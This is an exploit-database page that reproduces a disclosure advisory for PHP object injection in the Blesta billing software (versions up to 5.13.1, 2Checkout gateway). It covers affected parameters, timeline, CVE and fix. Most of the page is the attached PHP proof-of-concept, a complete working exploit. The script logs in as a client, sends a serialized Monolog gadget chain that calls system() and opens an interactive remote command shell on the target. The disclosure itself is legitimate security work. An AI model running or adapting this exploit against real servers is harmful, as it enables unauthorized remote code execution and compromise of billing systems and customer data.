Share
## https://sploitus.com/exploit?id=PACKETSTORM:214948
--------------------------------------------------------------------------
Blesta <= 5.13.1 (2Checkout) Multiple PHP Object Injection Vulnerabilities
--------------------------------------------------------------------------
[-] Software Link:
https://www.blesta.com
[-] Affected Versions:
All versions from 3.0.0 to 5.13.1.
[-] Vulnerabilities Description:
The vulnerabilities exist because user input passed through the
"invoices" POST parameter or the "item-ext-ref" GET parameter when
dispatching the Checkout2::validate() or Checkout2::success() method
is not properly sanitized before being used in a call to the
unserialize() PHP function. This can be exploited by malicious client
users to inject arbitrary PHP objects into the application scope,
allowing them to perform a variety of attacks, such as executing
arbitrary PHP code (RCE).
Successful exploitation of this issue requires the 2Checkout payment
gateway to be installed.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2026-25614.php
[-] Solution:
Apply the vendor patch or upgrade to version 5.13.2 or later.
[-] Disclosure Timeline:
[19/01/2026] - Vendor notified
[22/01/2026] - CVE identifier requested
[28/01/2026] - Version 5.13.2 released
[31/01/2026] - Version 5.13.3 released to address regressions
introduced in 5.13.2
[03/02/2026] - CVE identifier assigned
[04/02/2026] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.org) has
assigned the name CVE-2026-25614 to these vulnerabilities.
[-] Credits:
Vulnerabilities discovered by Egidio Romano.
[-] Other References:
https://www.blesta.com/2026/01/28/security-advisory/
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-03
--- packet storm attached poc: ---
<?php
/*
--------------------------------------------------------------------------
Blesta <= 5.13.1 (2Checkout) Multiple PHP Object Injection Vulnerabilities
--------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.blesta.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-03
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+-------------------------------------------------------------------+";
print "\n| Blesta <= 5.13.1 (2Checkout) PHP Object Injection Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 4)
{
print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
print "\nExample....: php $argv[0] http://localhost/blesta/ egix password";
print "\nExample....: php $argv[0] https://www.blesta.com/ hacker pwned\n\n";
die();
}
class Monolog_Handler_SyslogUdpHandler
{
protected $socket;
function __construct($x)
{
$this->socket = $x;
}
}
class Monolog_Handler_BufferHandler
{
protected $handler;
protected $bufferSize = -1;
protected $buffer;
protected $level = null;
protected $initialized = true;
protected $bufferLimit = -1;
protected $processors;
function __construct($methods, $command)
{
$this->processors = $methods;
$this->buffer = [$command];
$this->handler = $this;
}
}
function exec_cmd($cmd)
{
global $ch, $url, $token;
$cmd .= "; echo CMDDELIM";
$chain = new Monolog_Handler_SyslogUdpHandler(new Monolog_Handler_BufferHandler(['current', 'system'], [$cmd, 'level' => null]));
$chain = base64_encode(str_replace('_', '\\', serialize($chain)));
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["invoices" => $chain]));
return curl_exec($ch);
}
$url = $argv[1];
$user = $argv[2];
$pwd = $argv[3];
$ch = curl_init();
@unlink("./cookies.txt");
curl_setopt($ch, CURLOPT_URL, "{$url}client/login/");
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8080');
print "\n[+] Performing client login with username '{$user}' and password '{$pwd}'\n";
if (!preg_match('/"_csrf_token" value="([^"]+)/i', curl_exec($ch), $token)) die("[-] CSRF token not found!\n\n");
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["_csrf_token" => $token[1], "username" => $user, "password" => $pwd]));
if (preg_match('/alert-danger/i', curl_exec($ch))) die("[-] Login failed!\n\n");
print "[+] Launching shell\n";
curl_setopt($ch, CURLOPT_URL, "{$url}client_pay/received/checkout2");
while(1)
{
print "\nblesta-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match('/(.*)CMDDELIM/s', exec_cmd($cmd), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}